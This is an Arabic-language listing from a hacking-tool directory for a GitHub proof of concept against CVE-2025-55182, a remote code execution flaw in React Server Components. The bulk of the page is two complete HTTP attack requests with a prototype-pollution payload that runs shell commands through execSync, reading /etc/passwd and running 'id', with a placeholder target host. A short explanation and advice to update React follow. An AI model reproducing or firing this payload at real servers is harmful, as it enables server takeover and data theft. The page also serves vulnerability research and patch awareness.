Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
React2Shell_cve-2025-55182 | Kitploit
أدوات/GitHubGitHub/ethicalrohitt/react2shell_cve-2025-55182
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubethicalrohitt/react2shell_cve-2025-55182

React2Shell_cve-2025-55182

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ 8 أشهرلم تتم المراجعة بعد

ثغرة تنفيذ الأوامر عن بُعد في React Server Components - CVE-2025-55182

مرحبًا! أتمنى أن يكون يومك رائعًا! 😊✨

ما الموضوع؟

إصدارات React Server Components 19.0.0 و19.1.0 و19.1.1 و19.2.0 تعاني من مشكلة أمنية خطيرة. الحزم المتأثرة هي react-server-dom-parcel وreact-server-dom-turbopack وreact-server-dom-webpack.

تحدث المشكلة عندما يقرأ الخادم البيانات من الطلبات بطريقة غير آمنة. يمكن للمهاجمين إرسال بيانات خاصة تجعل الخادم ينفّذ أوامرهم.


إثبات المفهوم - مثال كامل للهجوم

إليك طلب الهجوم الكامل الذي يُظهر المشكلة. لقد استبدلت الأوامر بأمثلة آمنة.

استبدل target-website.com بالموقع الذي تختبره.

طلب الهجوم رقم 1 - قراءة ملف النظام

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

طلب الهجوم رقم 2 - التحقق من معلومات المستخدم

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

شرح مبسط

  1. يقرأ الخادم البيانات من الطلب
  2. يمكن للبيانات الخبيثة خداع الخادم لتنفيذ الأوامر
  3. يمكن للمهاجمين تنفيذ أي أمر يريدونه
  4. الأوامر مخفية في البيانات التي نرسلها

ماذا يمكن أن يحدث؟

يمكن للمهاجمين:

  • تنفيذ أي أمر على الخادم
  • قراءة الملفات السرية
  • السيطرة على الخادم
  • سرقة جميع البيانات

كيفية الإصلاح

حدّث React فورًا! احصل على أحدث إصدار تم إصلاح هذه المشكلة فيه.


روابط مفيدة

  • أداة الفحص الرسمية
  • التفاصيل التقنية
  • إشعار أمني من Facebook
  • قائمة OpenWall الأمنية
  • مدونة React الرسمية
  • إشعار أمني من Next.js
  • إشعار التحديث من Vercel

اعتنِ بنفسك وابقَ آمنًا في جانبك! ✨❤️

تنزيل الأداة